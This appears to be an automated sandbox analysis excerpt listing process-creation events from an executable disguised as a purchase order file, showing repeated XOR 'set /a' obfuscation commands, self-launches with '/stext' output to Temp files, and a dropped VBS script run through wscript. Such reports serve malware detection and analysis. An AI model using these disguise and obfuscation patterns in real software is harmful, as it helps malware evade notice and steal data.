              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\blnru"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\ohfuvpkfznra"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
